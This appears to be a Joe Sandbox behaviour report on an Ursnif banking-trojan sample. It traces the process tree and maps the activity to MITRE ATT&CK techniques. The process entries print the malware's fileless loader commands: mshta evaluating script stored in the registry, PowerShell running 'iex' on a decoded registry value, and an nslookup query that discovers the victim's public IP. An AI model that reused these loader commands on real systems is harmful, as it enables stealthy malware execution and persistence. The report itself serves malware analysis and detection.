Analysis Process: mshta.exe PID: 7008 Parent PID: 3424

General

Start time:	12:19:24
Start date:	23/11/2020
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Imagebase:	0x7ff7e3470000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: powershell.exe PID: 4604 Parent PID: 7008

General

Start time:	12:19:26
Start date:	23/11/2020
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Imagebase:	0x7ff7bedd0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: conhost.exe PID: 3980 Parent PID: 4604

General

Start time:	12:19:26
Start date:	23/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: csc.exe PID: 3484 Parent PID: 4604

General

Start time:	12:19:39
Start date:	23/11/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'
Imagebase:	0x7ff72bda0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Analysis Process: cvtres.exe PID: 6200 Parent PID: 3484

General

Start time:	12:19:40
Start date:	23/11/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES269.tmp' 'c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP'
Imagebase:	0x7ff7cafe0000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: csc.exe PID: 4700 Parent PID: 4604

General

Start time:	12:19:44
Start date:	23/11/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'
Imagebase:	0x7ff72bda0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Analysis Process: control.exe PID: 6328 Parent PID: 4240

General

Start time:	12:19:45
Start date:	23/11/2020
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff72cb90000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: cvtres.exe PID: 796 Parent PID: 4700

General

Start time:	12:19:45
Start date:	23/11/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES16AC.tmp' 'c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP'
Imagebase:	0x7ff7cafe0000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: explorer.exe PID: 3424 Parent PID: 6328

General

Start time:	12:19:54
Start date:	23/11/2020
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: RuntimeBroker.exe PID: 3656 Parent PID: 3424

General

Start time:	12:19:56
Start date:	23/11/2020
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6b0ff0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: RuntimeBroker.exe PID: 4268 Parent PID: 3424

General

Start time:	12:20:00
Start date:	23/11/2020
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6b0ff0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp, Author: Joe Security

Analysis Process: cmd.exe PID: 2216 Parent PID: 3424

General

Start time:	12:20:03
Start date:	23/11/2020
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\404E.bi1'
Imagebase:	0xc60000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: RuntimeBroker.exe PID: 4772 Parent PID: 3424

General

Start time:	12:20:03
Start date:	23/11/2020
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6b0ff0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp, Author: Joe Security

Analysis Process: conhost.exe PID: 6692 Parent PID: 2216

General

Start time:	12:20:07
Start date:	23/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: nslookup.exe PID: 6632 Parent PID: 2216

General

Start time:	12:20:07
Start date:	23/11/2020
Path:	C:\Windows\System32\nslookup.exe
Wow64 process (32bit):	false
Commandline:	nslookup myip.opendns.com resolver1.opendns.com
Imagebase:	0x7ff69c1d0000
File size:	86528 bytes
MD5 hash:	AF1787F1DBE0053D74FC687E7233F8CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: RuntimeBroker.exe PID: 4660 Parent PID: 3424

General

Start time:	12:20:09
Start date:	23/11/2020
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6b0ff0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp, Author: Joe Security

Analysis Process: rundll32.exe PID: 6828 Parent PID: 6328

General

Start time:	12:20:12
Start date:	23/11/2020
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Imagebase:	0x7ff7e3a80000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp, Author: Joe Security

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 2Q4tLHa5wbO1.vbs

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

User Modules

Hook Summary

Processes

Statistics

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre